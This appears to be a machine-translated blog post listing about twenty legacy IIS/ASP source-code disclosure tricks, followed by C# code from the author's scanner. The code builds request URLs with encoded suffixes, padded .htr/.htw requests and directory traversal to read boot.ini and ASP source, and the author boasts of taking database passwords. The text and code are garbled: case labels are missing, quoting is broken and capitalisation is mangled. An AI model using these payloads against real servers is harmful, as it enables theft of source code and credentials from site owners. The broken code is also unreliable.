It is well known that Windows platform is riddled with holes and patches one after another, but it is always mended. I have summed up the 20 kinds of methods I know to see the ASP source code, and in C # write an application to scan these vulnerabilities, found that although most of the methods have not been used, but there are some slip through: the results of these two naïve to see a lot of the source code, including the database password, If you use Access to download the library, and SQL Server, if not with UDL,DSN, etc. to connect, you can also connect to the database through the TCP/IP network library, do whatever you want. First of all, these 20 methods are listed below:
.
%81
::DATA
%2e
%2e%41sp
+.htr
\\
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f
Above these vulnerabilities in front of the 10 several is through the ASP file directly after the addition, such as%81 is xxx.asp%81, the following are all through the example of IIS or system vulnerabilities implemented, the most special is the kind of translate:f method, which is directly through the browser is not available, You must establish a TCP/IP socket connection with the server, send a request to the line, specific how each vulnerability to use, see below, this is part of my application, if you want all can go to my site to download.
Switch (THIS.CBOMETHOD.SELECTEDINDEX)
{
Case 0://Direct Read
Strrequestfile = strserver + strurl;
break;
Case 5://%2E%41SP
Strrequestfile = strserver + strpath + strfirst
+ "%2E%41SP";
break;
Case 8://LONGHTR
Strrequestfile = strserver + strurl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.HTR";
break;
Case://codebrws.asp
Strrequestfile = strserver + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strURL;
break;
Case one://showcode.asp
Strrequestfile = strserver + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/." /.. /.. /.. /boot.ini ";
Break
Case://NULL.HTW
Strrequestfile = strserver + "/null.htw?" Ciwebhitsfile= "
+ strURL + "%20&cirestriction=none&cihilitetype=full";
break;
Case://QFULLHIT.HTW
Strrequestfile = strserver + "/iissamples/issamples/oop/qfullhit.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Case://QSUMRHIT.HTW
Strrequestfile = strserver + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Case://QUERY.IDQ
Strrequestfile = strserver + "/QUERY.IDQ?" citemplate=/.. /.. /boot.ini "
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.HTX";
break;
Case://SEARCH/QFULLHIT.HTW
Strrequestfile = strserver + "/iissamples/exair/search/qfullhit.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Case://SEARCH/QSUMRHIT.HTW
Strrequestfile = strserver + "/iissamples/exair/search/qsumrhit.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Case://IIRTURNH.HTW
Strrequestfile = strserver + "/iishelp/iis/misc/iirturnh.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Case://.HTW
Strrequestfile = strserver + strurl
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20.htw?"
+ "ciwebhitsfile=/." /.. /boot.ini&cirestriction=none "
+ "&cihilitetype=full";
break;
Default
Strrequestfile = strserver + strURL + this.cboMethod.Text;
}